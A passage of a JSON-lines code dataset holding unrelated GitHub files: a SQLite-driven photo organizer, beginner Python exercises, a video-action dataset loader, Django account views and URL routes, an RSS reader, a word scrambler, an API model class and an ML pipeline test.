' + directory)\n\n\ndef connection():\n    try:\n        con = sqlite3.connect(sql_path)\n        return con\n    except Error as e:\n        print(e)\n\n\ndef read_all(con) -> list:\n    # read the db file and collect the (filename, label) tuples in db_info\n    db_info = []\n    cursor_db = con.cursor()\n    cursor_db.execute(\n        f'SELECT name,label FROM FileSystem_Nodes where label is not null and parentPath=\"{db_parent_path}\"')\n    raw_datas = (cursor_db.fetchall())\n    for row in raw_datas:\n        db_info.append(row)\n    print(db_info)\n    return db_info\n\n\ndef move_file(parent_path, file_name):\n    try:\n        shutil.move(f'{parent_path}/{file_name}', f\"{parent_path}/trash\")\n    except (FileNotFoundError, shutil.Error) as e:\n        print(e)\n    else:\n        print(file_name + \" moved to trash\")\n\n\ndef file_classification(file_info: list, parent_path):\n    # take db_info as a list and judge whether to move each file to trash or not\n\n    # we create a trash folder to safely classify the files instead of deleting them\n    # exceptions when the trash folder already exists must be handled\n    createFolder(f'{parent_path}/trash')\n\n    for i in file_info:\n        jpg_version_file_name = i[0]\n        raw_version_file_name = i[0][:-4] + \".ARW\"\n\n        if i[1] == \"leave jpg\":\n            move_file(parent_path, raw_version_file_name)\n        elif i[1] == \"delete\":\n            move_file(parent_path, raw_version_file_name)\n            move_file(parent_path, jpg_version_file_name)\n\n\ndef check(con):\n    cursor_db = con.cursor()\n    cursor_db.execute(\n        f'SELECT COUNT(*) FROM FileSystem_Nodes where label=\"Approved\" and parentPath=\"{db_parent_path}\" ')\n    approved_file_count = cursor_db.fetchall()\n    print(\"Approved files : \" + str(approved_file_count))\n\n    cursor_db.execute(\n        f'SELECT COUNT(*) FROM FileSystem_Nodes where label=\"leave jpg\" and parentPath=\"{db_parent_path}\" ')\n    jpg_only_file_count = cursor_db.fetchall()\n    print(\"jpg left files : \" + str(jpg_only_file_count))\n\n    original_folder_file_list = os.listdir(target_folder)\n    original_folder_size = len([file for file in original_folder_file_list if file.endswith(\".JPG\")])\n    print(\"original file count : \" + str(original_folder_size))\n\n    trash_folder_file_list = os.listdir(target_folder + \"/trash\")\n    trash_folder_size = len([file for file in trash_folder_file_list if file.endswith(\".JPG\")])\n    print(\"trash_folder count : \" + str(trash_folder_size))\n\n    if original_folder_size == approved_file_count[0][0] * 2 + jpg_only_file_count[0][0]:\n        # originally the check formula should be different, but since we labeled the arw files the same as the jpg files\n        # the formula looks like the above\n        print('--------------------------------')\n        print(\"NO ERROR\")\n    else:\n        print(\" ERROR exists \")\n\n\ndef label_arw(con):\n    # label arw files the same as the jpg file\n    cursor_db = con.cursor()\n    cursor_db.execute(\n        f'UPDATE FileSystem_Nodes set label = \"Approved\" where sortName in (select REPLACE(sortName, \"JPG\", \"ARW\") as target_arw FROM FileSystem_Nodes where label=\"Approved\" and parentPath=\"{db_parent_path}\") ')\n    con.commit()\n\n\ncon = connection()\nlabel_arw(con)\nfile_classification(read_all(con), target_folder)\n\ncheck(con)\n","repo_name":"ahnavocado/Bridge_organizer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"40220706968","text":"#Exercise 5: Check if the first and last number of a list is the same\n\n# we can step through however many numbers the list holds with a for loop.\n# with for,\n# if we pass over all the elements, we can compare the last and the first
\n\n\n# =============================================================================\n#Example:\n# # Given list: [10, 20, 30, 40, 10]\n# # result is True\n#\n# # numbers_y = [75, 65, 35, 75, 30]\n# # result is False\n# =============================================================================\n\n\n\ndef firstnlast(c):\n    # compare the first and last elements directly; no loop is needed\n    return c[0] == c[-1]\n\n\n\nprint(firstnlast([1,43,6,10,1]))  # True","repo_name":"deni-13/coding-challenges","sub_path":"pynative/basics/basics/1 (6).py","file_name":"1 (6).py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"73432349354","text":"from __future__ import print_function\nimport numpy as np\nimport utils.wsad_utils as utils\nimport random\nimport os\nimport options\nimport torch\nimport torchtext\nimport torch.nn as nn\nimport torch.nn.functional as F\n#import gensim\nimport nltk\nimport pickle\ndef get_video_prompt_templates():\n    prompts = [\n        'one video of the ',\n    ]\n    return prompts\n\nclasses = {\n    'BaseballPitch': 'baseball pitch',\n    'BasketballDunk': 'basketball dunk',\n    'Billiards': 'billiards',\n    'CleanAndJerk': 'clean and jerk',\n    'CliffDiving': 'cliff diving',\n    'CricketBowling': 'cricket bowling',\n    'CricketShot': 'cricket shot',\n    'Diving': 'diving',\n    'FrisbeeCatch': 'frisbee catch',\n    'GolfSwing': 'golf swing',\n    'HammerThrow': 'hammer throw',\n    'HighJump': 'high jump',\n    'JavelinThrow': 'javelin throw',\n    'LongJump': 'long jump',\n    'PoleVault': 'pole vault',\n    'Shotput': 'shot put',\n    'SoccerPenalty': 'soccer penalty',\n    'TennisSwing': 'tennis swing',\n    'ThrowDiscus': 'throw discus',\n    'VolleyballSpiking': 'volleyball spiking'\n}\n\nclass SampleDataset:\n    def __init__(self, args, mode=\"both\",sampling='random'):\n        with open('./vocab/vocab.pkl', 'rb') as fp:\n            vocab = pickle.load(fp)\n        \n        self.vocab = vocab\n        self.keep_vocab = dict()\n        for w, _ in vocab['counter'].most_common(8000):\n            self.keep_vocab[w] = self.vocab_size\n        \n        self.dataset_name = args.dataset_name\n        self.num_class = args.num_class\n        self.sampling=sampling\n        self.num_segments = args.max_seqlen\n        self.feature_size = args.feature_size\n        self.path_to_features = os.path.join(\"./Thumos14reduced/Thumos14reduced-I3D-JOINTFeatures.npy\")\n        self.path_to_annotations = os.path.join(\"./Thumos14reduced-Annotations/\")\n        self.features = np.load(\n            self.path_to_features, encoding=\"bytes\", allow_pickle=True\n        )\n        self.segments = np.load(\n            self.path_to_annotations + \"segments.npy\", allow_pickle=True\n        )\n        self.labels = np.load(\n            self.path_to_annotations + \"labels_all.npy\", allow_pickle=True\n        )\n        # Specific to Thumos14\n\n        self._labels = np.load(\n            self.path_to_annotations + \"labels.npy\", allow_pickle=True\n        )\n        self.classlist = np.load(\n            self.path_to_annotations + \"classlist.npy\", allow_pickle=True\n        )\n        self.subset = np.load(\n            self.path_to_annotations + \"subset.npy\", allow_pickle=True\n        )\n        self.videonames = np.load(\n            self.path_to_annotations + \"videoname.npy\", allow_pickle=True\n        )\n        self.batch_size = args.batch_size\n        self.len_txt = 20\n        self.trainidx = []\n        self.testidx = []\n        self.classwiseidx = []\n        self.currenttestidx = 0\n        self.labels_multihot = [\n            utils.strlist2multihot(labs, self.classlist)\n            for labs in self.labels\n        ]\n        try:\n            ambilist = self.path_to_annotations + \"/Ambiguous_test.txt\"\n            ambilist = list(open(ambilist, \"r\"))\n            ambilist = [a.strip(\"\\n\").split(\" \")[0] for a in ambilist]\n        except Exception:\n            ambilist 
= []\n        self.train_test_idx()\n        self.classwise_feature_mapping()\n\n        self.normalize = False\n        self.mode = mode\n        if mode == \"rgb\" or mode == \"flow\":\n            self.feature_size = 1024\n\n    @property\n    def vocab_size(self):\n        return len(self.keep_vocab) + 1\n    \n    def train_test_idx(self):\n        for i, s in enumerate(self.subset):\n            if s.decode(\"utf-8\") == \"validation\":  # Specific to Thumos14\n                self.trainidx.append(i)\n                #self.testidx.append(i)\n            elif s.decode(\"utf-8\") == \"test\":\n                self.testidx.append(i)\n\n    def classwise_feature_mapping(self):\n        for category in self.classlist:\n            idx = []\n            for i in self.trainidx:\n                for label in self.labels[i]:\n                    if label == category.decode(\"utf-8\"):\n                        idx.append(i)\n                        break\n            self.classwiseidx.append(idx)\n\n    def load_data(self,n_pro=14, n_similar=0, is_training=True, similar_size=2):\n        if is_training:\n            labels = []\n            idx = []\n\n            # Load similar pairs\n            if n_similar != 0:\n                rand_classid = np.random.choice(\n                    len(self.classwiseidx), size=n_similar\n                )\n                for rid in rand_classid:\n                    rand_sampleid = np.random.choice(\n                        len(self.classwiseidx[rid]),\n                        size=similar_size,\n                        replace=False,\n                    )\n\n                    for k in rand_sampleid:\n                        idx.append(self.classwiseidx[rid][k])\n\n            # Load rest pairs\n            if self.batch_size - similar_size * n_similar < 0:\n                self.batch_size = similar_size * n_similar\n\n            rand_sampleid = np.random.choice(\n                len(self.trainidx),\n                size=self.batch_size - similar_size * n_similar,\n            )\n\n            for r in rand_sampleid:\n                idx.append(self.trainidx[r])\n            \n            feat = []\n            words_feat_batch = []\n            words_batch = []\n            words_len_batch = []\n            words_id_batch = []\n            words_weight_batch = []\n            for i in idx:\n                ifeat = self.features[i]\n                labs = self.labels[i]\n                prompts = get_video_prompt_templates()\n                prompt = random.choice(prompts)\n                # Build a natural-language pseudo sentence from the video's class labels\n                if len(labs) == 3:\n                    for jdx, lab in enumerate(labs):\n                        lab_ = classes[lab]\n                        if jdx == 0:\n                            pseudo_sent = prompt + lab_ + ', '\n                        elif jdx == 1:\n                            pseudo_sent += lab_ + ' and '\n                        else:\n                            pseudo_sent += lab_ + '.'\n                elif len(labs) == 2:\n                    for jdx, lab in enumerate(labs):\n                        lab_ = classes[lab]\n                        if jdx == 0:\n                            pseudo_sent = prompt + lab_ + ' and '\n                        elif jdx == 1:\n                            pseudo_sent += lab_ + '.'\n                elif len(labs) == 1:\n                    for jdx, lab in enumerate(labs):\n                        lab_ = classes[lab]\n                        pseudo_sent = prompt + lab_ + '.'\n                \n                iwords = []\n                iweights = []\n                \n                i_words_feat = np.zeros([n_pro+1,300])\n                i_weights = np.zeros([n_pro])\n                i_words_id = np.zeros([n_pro])\n                for word, tag in nltk.pos_tag(nltk.tokenize.word_tokenize(pseudo_sent)):\n                    word = word.lower()\n                    if word in self.keep_vocab:\n                        if 'NN' in tag:\n                            iweights.append(2)\n                        elif 'VB' in tag:\n                            iweights.append(2)\n                        elif 'VJJ' in tag or 'RB' in tag:\n                            iweights.append(2)\n                        else:\n                            iweights.append(1)\n                        iwords.append(word)\n                \n                iwords_len = len(iwords)\n                i_weights[:iwords_len] = iweights\n                iwords_id = [self.keep_vocab[w] for w in iwords]\n                i_words_id[:iwords_len] = iwords_id\n                \n                iwords_feat = [self.vocab['id2vec'][self.vocab['w2id'][iwords[0]]].astype(np.float32)]\n                iwords_feat.extend(self.vocab['id2vec'][self.vocab['w2id'][w]].astype(np.float32) for w in iwords)\n                iwords_feat = np.asarray(iwords_feat)\n                i_words_feat[:iwords_feat.shape[0],:] = iwords_feat\n\n                words_feat_batch.append(i_words_feat)\n                words_id_batch.append(i_words_id)\n                words_weight_batch.append(i_weights)\n                words_len_batch.append(iwords_len)\n                words_batch.append(iwords)\n\n                if self.sampling == 'random':\n                    sample_idx = self.random_perturb(ifeat.shape[0])\n                elif self.sampling == 'uniform':\n                    sample_idx = self.uniform_sampling(ifeat.shape[0])\n                elif 
self.sampling == \"all\":\n sample_idx = np.arange(ifeat.shape[0])\n else:\n raise AssertionError('Not supported sampling !')\n ifeat = ifeat[sample_idx]\n feat.append(ifeat)\n \n words_feat_batch = np.array(words_feat_batch)\n words_id_batch = np.array(words_id_batch)\n words_weight_batch = np.array(words_weight_batch)\n words_len_batch = np.array(words_len_batch)\n feat = np.array(feat)\n labels = np.array([self.labels_multihot[i] for i in idx])\n if self.mode == \"rgb\":\n feat = feat[..., : self.feature_size]\n elif self.mode == \"flow\":\n feat = feat[..., self.feature_size :]\n return feat, labels,rand_sampleid,words_batch,words_feat_batch,words_id_batch,words_weight_batch,words_len_batch\n\n else:\n labs = self.labels_multihot[self.testidx[self.currenttestidx]]\n feat = self.features[self.testidx[self.currenttestidx]]\n vn = self.videonames[self.testidx[self.currenttestidx]]\n if self.currenttestidx == len(self.testidx) - 1:\n done = True\n self.currenttestidx = 0\n else:\n done = False\n self.currenttestidx += 1\n feat = np.array(feat)\n if self.mode == \"rgb\":\n feat = feat[..., : self.feature_size]\n elif self.mode == \"flow\":\n feat = feat[..., self.feature_size :]\n return feat, np.array(labs),vn, done\n \n def random_avg(self, x, segm=None):\n if len(x) < self.num_segments:\n ind = self.random_perturb(len(x))\n x_n = x[ind]\n segm = segm[ind] if segm is not None else None\n return x_n, segm\n else:\n inds = np.array_split(np.arange(len(x)), self.num_segments)\n x_n = np.zeros((self.num_segments, x.shape[-1])).astype(x.dtype)\n segm_n = np.zeros(\n (self.num_segments, segm.shape[-1])).astype(x.dtype)\n for i, ind in enumerate(inds):\n x_n[i] = np.mean(x[ind], axis=0)\n if segm is not None:\n segm_n[i] = segm[(ind[0] + ind[-1]) // 2]\n return x_n, segm_n if segm is not None else None\n\n def random_pad(self, x, segm=None):\n length = self.num_segments\n if x.shape[0] > length:\n strt = np.random.randint(0, x.shape[0] - length)\n x_ret = x[strt:strt + length]\n if segm is not None:\n segm = segm[strt:strt + length]\n return x_ret, segm\n elif x.shape[0] == length:\n return x, segm\n else:\n pad_len = length - x.shape[0]\n x_ret = np.pad(x, ((0, pad_len), (0, 0)), mode='constant')\n if segm is not None:\n segm = np.pad(segm, ((0, pad_len), (0, 0)), mode='constant')\n return x_ret, segm\n\n def random_perturb(self, length):\n if self.num_segments == length:\n return np.arange(self.num_segments).astype(int)\n samples = np.arange(self.num_segments) * length / self.num_segments\n for i in range(self.num_segments):\n if i < self.num_segments - 1:\n if int(samples[i]) != int(samples[i + 1]):\n samples[i] = np.random.choice(\n range(int(samples[i]),\n int(samples[i + 1]) + 1))\n else:\n samples[i] = int(samples[i])\n else:\n if int(samples[i]) < length - 1:\n samples[i] = np.random.choice(\n range(int(samples[i]), length))\n else:\n samples[i] = int(samples[i])\n return samples.astype(int)\n\n def uniform_sampling(self, length):\n if self.num_segments == length:\n return np.arange(self.num_segments).astype(int)\n samples = np.arange(self.num_segments) * length / self.num_segments\n samples = np.floor(samples)\n return samples.astype(int)\n\n\nif __name__ == '__main__':\n args = options.parser.parse_args()\n dt = SampleDataset(args)\n features, labels, pairs_id,words_batch,words_feat_batch,words_id_batch,words_weight_batch,words_len_batch = dt.load_data(n_similar=args.num_similar)\n print(features.shape,labels.shape)\n seq_len = np.sum(np.max(np.abs(features), axis=2) > 0, axis=1)\n 
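# seq_len counts, per video, the sampled timesteps with any non-zero feature, i.e. the unpadded length.\n    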
print(type(seq_len))\n","repo_name":"lgzlIlIlI/Boosting-WTAL","sub_path":"wsad_dataset.py","file_name":"wsad_dataset.py","file_ext":"py","file_size_in_byte":13336,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"72"}
{"seq_id":"36777703516","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth import login as auth_login\nfrom django.contrib.auth import logout as auth_logout\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom .forms import CustomUserCreationForm\n\n# Create your views here.\n\ndef signup(request):\n    if request.method == 'POST':\n        form = CustomUserCreationForm(request.POST)\n        if form.is_valid():\n            form.save()\n            return redirect('accounts:login')\n    else:\n        form = CustomUserCreationForm()\n    context = {\n        'form': form,\n    }\n    return render(request, 'accounts/signup.html', context)\n\ndef login(request):\n    if request.method == 'POST':\n        form = AuthenticationForm(request, request.POST)\n        if form.is_valid():\n            auth_login(request, form.get_user())\n            return redirect('todos:index')\n    else:\n        form = AuthenticationForm()\n    context = {\n        'form': form\n    }\n    return render(request, 'accounts/login.html', context)\n\ndef logout(request):\n    auth_logout(request)\n    return redirect('accounts:login')\n","repo_name":"yooooonzzzzzang/Djangoletsgo","sub_path":"1006_workshop/accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"27405428695","text":"import random\nimport re\n\n_SCRAMBLE_CHARS = '[a-zA-Z]'\n\ndef scramble(s):\n    arr = [c for c in s]\n    random.shuffle(arr)\n    return ''.join(arr)\n\n\ndef word_scramble(word, keep_left=1, keep_right=1):\n    if keep_left + keep_right >= len(word):\n        return word\n\n    left_pos = keep_left\n    right_pos = len(word) - keep_right\n\n    left = word[0:left_pos]\n    mid = scramble(word[left_pos:right_pos])\n    right = word[right_pos:]\n\n    return left + mid + right\n\n\ndef text_scramble(text, keep_left=1, keep_right=1):\n    current = ''\n    new_text = ''\n    for c in text:\n        if re.match(_SCRAMBLE_CHARS, c):\n            current += c\n        else:\n            if current:\n                new_text += word_scramble(current, keep_left, keep_right)\n                current = ''\n            new_text += c\n\n    if current:\n        new_text += word_scramble(current, keep_left, keep_right)\n\n    return new_text\n","repo_name":"aherrman/wordscramble","sub_path":"scrambler.py","file_name":"scrambler.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"26873908912","text":"from typing import Any, BinaryIO, Dict, List, Optional, TextIO, Tuple, Type, TypeVar, Union\n\nimport attr\n\nfrom ..types import UNSET, Unset\n\nT = TypeVar(\"T\", bound=\"StoreRetailerAppearance\")\n\n\n@attr.s(auto_attribs=True)\nclass StoreRetailerAppearance:\n    \"\"\"\n    Attributes:\n        background_color (Union[Unset, str]):\n        image_color (Union[Unset, str]):\n        black_theme (Union[Unset, bool]):\n        logo_image (Union[Unset, str]):\n        side_image (Union[Unset, str]):\n        mini_logo_image (Union[Unset, str]):\n    \"\"\"\n\n    background_color: Union[Unset, str] = UNSET\n    image_color: Union[Unset, str] = UNSET\n    black_theme: Union[Unset, bool] = UNSET\n    logo_image: Union[Unset, str] = UNSET\n    side_image: Union[Unset, str] = UNSET\n    mini_logo_image: Union[Unset, str] = UNSET\n    additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)\n\n    def to_dict(self) -> 
Dict[str, Any]:\n        background_color = self.background_color\n        image_color = self.image_color\n        black_theme = self.black_theme\n        logo_image = self.logo_image\n        side_image = self.side_image\n        mini_logo_image = self.mini_logo_image\n\n        field_dict: Dict[str, Any] = {}\n        field_dict.update(self.additional_properties)\n        field_dict.update({})\n        if background_color is not UNSET:\n            field_dict[\"background_color\"] = background_color\n        if image_color is not UNSET:\n            field_dict[\"image_color\"] = image_color\n        if black_theme is not UNSET:\n            field_dict[\"black_theme\"] = black_theme\n        if logo_image is not UNSET:\n            field_dict[\"logo_image\"] = logo_image\n        if side_image is not UNSET:\n            field_dict[\"side_image\"] = side_image\n        if mini_logo_image is not UNSET:\n            field_dict[\"mini_logo_image\"] = mini_logo_image\n\n        return field_dict\n\n    @classmethod\n    def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n        d = src_dict.copy()\n        background_color = d.pop(\"background_color\", UNSET)\n\n        image_color = d.pop(\"image_color\", UNSET)\n\n        black_theme = d.pop(\"black_theme\", UNSET)\n\n        logo_image = d.pop(\"logo_image\", UNSET)\n\n        side_image = d.pop(\"side_image\", UNSET)\n\n        mini_logo_image = d.pop(\"mini_logo_image\", UNSET)\n\n        store_retailer_appearance = cls(\n            background_color=background_color,\n            image_color=image_color,\n            black_theme=black_theme,\n            logo_image=logo_image,\n            side_image=side_image,\n            mini_logo_image=mini_logo_image,\n        )\n\n        store_retailer_appearance.additional_properties = d\n        return store_retailer_appearance\n\n    @property\n    def additional_keys(self) -> List[str]:\n        return list(self.additional_properties.keys())\n\n    def __getitem__(self, key: str) -> Any:\n        return self.additional_properties[key]\n\n    def __setitem__(self, key: str, value: Any) -> None:\n        self.additional_properties[key] = value\n\n    def __delitem__(self, key: str) -> None:\n        del self.additional_properties[key]\n\n    def __contains__(self, key: str) -> bool:\n        return key in self.additional_properties\n","repo_name":"Nov1kov/sbermarket-api","sub_path":"sbermarket_api/models/store_retailer_appearance.py","file_name":"store_retailer_appearance.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"}
{"seq_id":"73236438634","text":"import turtle\r\n\r\n# turtle.color('purple','yellow')\r\n# turtle.bgcolor('black')\r\n\r\n# for i in range(4):\r\n#     turtle.right(90)\r\n#     turtle.forward(100)\r\n\r\n# for i in range(25):\r\n#     turtle.right(15)\r\n#     turtle.forward(10)\r\n\r\n# if the condition is true\r\n#     do the action\r\n\r\n# num1 = int(input('enter a number'))\r\n# num2 = int(input('enter a number'))\r\n\r\n\r\n\r\n# if num1 != num2:\r\n#     print(f'{num1+num2} is not equal to {num2}')\r\n# elif: type(num1) ==t\r\n#     print(f'{num1} is not equal to {num2}')\r\nwhile True:\r\n    s = input('enter a shape')\r\n\r\n    if s == \"square\":\r\n        for i in range(4):\r\n            turtle.right(90)\r\n            turtle.forward(100)\r\n    elif s == \"circle\":\r\n        for i in range(25):\r\n            turtle.right(15)\r\n            turtle.forward(10)\r\n    else:\r\n        break\r\n","repo_name":"ITFriends14/Gregory-Riabikin","sub_path":"Pябікін 
Григорій/main8.py","file_name":"main8.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11465817467","text":"#!/usr/bin/env python\n\nimport json\nimport numpy as np\nimport pandas as pd\nimport os\nimport sys\nimport glob\n\nimport atomsci.ddm.pipeline.parameter_parser as parse\nfrom atomsci.ddm.pipeline import model_pipeline as mp\nfrom atomsci.ddm.pipeline import predict_from_model as pfm\n\ndef clean():\n    \"\"\"\n    Clean test files\n    \"\"\"\n    if \"output\" not in os.listdir():\n        os.mkdir(\"output\")\n    for f in os.listdir(\"./output\"):\n        if os.path.isfile(\"./output/\"+f):\n            os.remove(\"./output/\"+f)\n\ndef test():\n    \"\"\"\n    Test full model pipeline: Curate data, fit model, and predict property for new compounds\n    \"\"\"\n\n    # Clean\n    # -----\n    clean()\n\n    # Run HyperOpt\n    # ------------\n    with open(\"H1_RF.json\", \"r\") as f:\n        hp_params = json.load(f)\n\n    script_dir = parse.__file__.replace(\"parameter_parser.py\", \"\").replace(\"/pipeline/\", \"\")\n    python_path = sys.executable\n    hp_params[\"script_dir\"] = script_dir\n    hp_params[\"python_path\"] = python_path\n\n    params = parse.wrapper(hp_params)\n    if not os.path.isfile(params.dataset_key):\n        params.dataset_key = os.path.join(params.script_dir, params.dataset_key)\n\n    train_df = pd.read_csv(params.dataset_key)\n\n    print(\"Train an RF model with ECFP\")\n    pl = mp.ModelPipeline(params)\n    pl.train_model()\n\n    print(\"Calculate AD index with the just trained model.\")\n    pred_df_mp = pl.predict_on_dataframe(train_df[:10], contains_responses=True, AD_method=\"z_score\")\n\n    assert(\"AD_index\" in pred_df_mp.columns.values), 'Error: No AD_index column in pred_df_mp'\n\n    print(\"Calculate AD index with the saved model tarball file.\")\n    pred_df_file = pfm.predict_from_model_file(model_path=pl.params.model_tarball_path,\n                                               input_df=train_df[:10],\n                                               id_col=\"compound_id\",\n                                               smiles_col=\"base_rdkit_smiles\",\n                                               response_col=\"pKi_mean\",\n                                               dont_standardize=True,\n                                               AD_method=\"z_score\")\n    assert(\"AD_index\" in pred_df_file.columns.values), 'Error: No AD_index column in pred_df_file'\n\nif __name__ == '__main__':\n    test()\n","repo_name":"ATOMScience-org/AMPL","sub_path":"atomsci/ddm/test/integrative/ad_index/test_ad_index.py","file_name":"test_ad_index.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"72"} +{"seq_id":"16042462600","text":"from django.conf.urls import url\n\n\nfrom .src import user_portal, posts, comments, subscriptions, reactions\nfrom . 
import views\n\nfrom .src.ros_init import Rostrus_Application\n\nRostrus_Application.initialise_application()\n\nurlpatterns = [\n\n    url(r'^$', views.index, name='index'),\n    url(r'^test/?$', user_portal.views.test, name='test'),\n    url(r'^db_test/?$', user_portal.views.db_test, name='db_test'),\n\n\n    url(r'^register/?$', user_portal.views.register, name='register'),\n\n    url(r'^rostrus_login/?$', user_portal.views.rostrus_login, name='rostrus_login'),\n    url(r'^facebook_login/?$', user_portal.views.facebook_login, name='fb_login'),\n\n    url(r'^get_portal_prof_img_auth/?$', user_portal.views.get_portal_prof_img_upload_auth, name='get_google_cloud_token'),\n\n    url(r'^posts/write_post_type_article?$', posts.views.write_post_type_article, name='insert_article'),\n    url(r'^posts/modify_article?$', posts.views.update_article, name='modify_article'),\n    url(r'^posts/get_general_post_data?$', posts.views.get_for_you_posts, name='get_general_post_data'),\n    url(r'^posts/get_posts_of_tag?$', posts.views.get_posts_sub_tags, name='get_posts_from_sub_tags'),\n    url(r'^posts/get_posts_of_portal?$', posts.views.get_posts_sub_portals, name='get_posts_from_sub_portals'),\n    url(r'^posts/get_single_post_data?$', posts.views.get_single_post, name='get_single_post'),\n\n    url(r'^comments/write_comment?$', comments.views.write_comment, name='insert_comment'),\n    url(r'^comments/get_comments?$', comments.views.get_comments, name='get_comment'),\n    url(r'^comments/delete_comment?$', comments.views.delete_comment, name='del_comment'),\n\n    url(r'^profile/upload_profile_pic_url?$', user_portal.views.update_profile_pic_url, name='update_prof_pic'),\n    url(r'^profile/delete_profile_pic?$', user_portal.views.del_profile_pic, name='del_profile_pic'),\n\n    url(r'^subscriptions/get_portal_subscriptions?$', subscriptions.views.get_subed_portals, name='get_portal_sub'),\n    url(r'^subscriptions/get_tag_subscriptions?$', subscriptions.views.get_portal_sub_tags, name='get_tag_sub'),\n    url(r'^subscriptions/subscribe_tag?$', subscriptions.views.sub_tag, name='sub_tag'),\n    url(r'^subscriptions/subscribe_portal?$', subscriptions.views.sub_portal, name='sub_portal'),\n\n    url(r'^reactions/update_post_reaction?$', reactions.views.post_reaction_update, name='react_post_update'),\n    url(r'^reactions/update_comment_reaction?$', reactions.views.comm_reaction_update, name='react_comm_update'),\n\n\n]","repo_name":"BSathvik/RostrusPythonAPI","sub_path":"v1_0/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3917672088","text":"\n# Modules General\nimport re\nimport sys\nimport urllib\nfrom StringIO import StringIO\nfrom traceback import print_exc\n\nimport elementtree.HTMLTreeBuilder as HTB\n\n#modules custom\nfrom utilities import add_pretty_color, set_xbmc_carriage_return, strip_off\n\n\n# FUNCTION TO FETCH THE LANGUAGE LABELS.\n_ = sys.modules[ \"__main__\" ].__language__\n\n\nclass rssReader:\n    \"\"\"\n    Class responsible for fetching the RSS feed and extracting the RSS info\n    \"\"\"\n    def __init__( self, rss_title, rssUrl, titlecolor=\"ffffffff\", textcolor=\"ffffffff\" ):\n        self.rss_title = rss_title\n        self.titlecolor = titlecolor\n        self.textcolor = textcolor\n        #self.tags = ( [ \"feed\", \"entry\", \"content\" ], [ \"channel\", \"item\", \"title\" ] )[ ( not \"code.google\" in rssUrl ) ]\n        self.tags = ( [ \"feed\", \"entry\", \"title\" ], [ \"channel\", \"item\", \"title\" ] )[ ( not \"code.google\" 
in rssUrl ) ]\n        self.rssPage = self.load_feeds_infos( rssUrl )\n\n    def load_feeds_infos( self, url ):\n        try:\n            html = urllib.urlopen( url )\n            if \"code.google\" in url:\n                source = html.read()\n                parsed = HTB.parse( StringIO( source ), \"utf-8\" ).findall( self.tags[ 1 ] )\n            else:\n                source = re.sub( \"\", \"\", html.read() )\n                parsed = HTB.parse( StringIO( source ), \"utf-8\" ).findall( self.tags[ 0 ] )[ 0 ].findall( self.tags[ 1 ] )\n            html.close()\n            return parsed\n        except:\n            print_exc()\n            # if we reach this point the return value is automatically None\n\n    def GetRssInfo( self ):\n        try:\n            if self.rssPage is None: raise\n            items_listed = self.rssPage[ :10 ]\n            if not self.rss_title: maintitle = _( 107 )\n            else: maintitle = self.rss_title\n            items = add_pretty_color( maintitle + \": \", color=self.titlecolor )\n            item_sep = add_pretty_color( \" - \", color=self.textcolor )\n            item_end = len( items_listed )\n            for count, item in enumerate( items_listed ):\n                try:\n                    items += item.findtext( self.tags[ 2 ] ).replace( u'\\xa0', \" \" )\n                except:\n                    print_exc()\n                    continue\n                if ( ( count + 1 ) < item_end ):\n                    items += item_sep\n\n            if self.tags[ 1 ] == \"entry\":\n                items = strip_off( set_xbmc_carriage_return( items ).replace( \"[CR]\", \" \" ) )\n            return maintitle, items.replace( \"&quot;\", '\"' ).replace( \"&#39;\", \"'\" )\n        except:\n            print_exc()\n            return \"\", ( add_pretty_color( _( 107 ), color=self.titlecolor ) + _( 108 ) )\n\n","repo_name":"tcowans/passion-xbmc","sub_path":"scripts/Installer Passion-XBMC/resources/libs/RSSParser.py","file_name":"RSSParser.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"44354715195","text":"from django.db import models\n\ndef get_amount_field():\n    return models.DecimalField(default=0, max_digits=16, decimal_places=8)\n\nclass Account(models.Model):\n    username = models.CharField(max_length=30, unique=True)\n    password = models.CharField(max_length=60)\n    email = models.TextField(blank=True, null=True) # stored encrypted\n    created = models.DateTimeField(auto_now_add=True)\n    allow_auth = models.BooleanField(default=True)\n    allow_orders = models.BooleanField(default=True)\n    allow_transfers = models.BooleanField(default=True)\n    deposit_address = models.CharField(max_length=40, blank=True, null=True)\n    deposit_ref = models.CharField(max_length=30, blank=True, null=True)\n    commission_rate = models.DecimalField(max_digits=5, decimal_places=4)\n\n    def __str__(self):\n        return self.username\n\nclass Currency(models.Model):\n    name = models.CharField(max_length=40, unique=True)\n    code = models.CharField(max_length=4, unique=True)\n    symbol = models.CharField(max_length=1, blank=True, null=True)\n\n    def __str__(self):\n        return self.code\n\nclass Balance(models.Model):\n    account = models.ForeignKey(Account, related_name='balances')\n    currency = models.ForeignKey(Currency, related_name='balances')\n    amount = get_amount_field()\n    last_updated = models.DateTimeField(auto_now=True)\n\n    class Meta:\n        unique_together = (('account', 'currency'),)\n\n    def __str__(self):\n        return \"%s has %s %s\" % (self.account, self.amount, self.currency)\n\nclass Order(models.Model):\n    balance = models.ForeignKey(Balance, 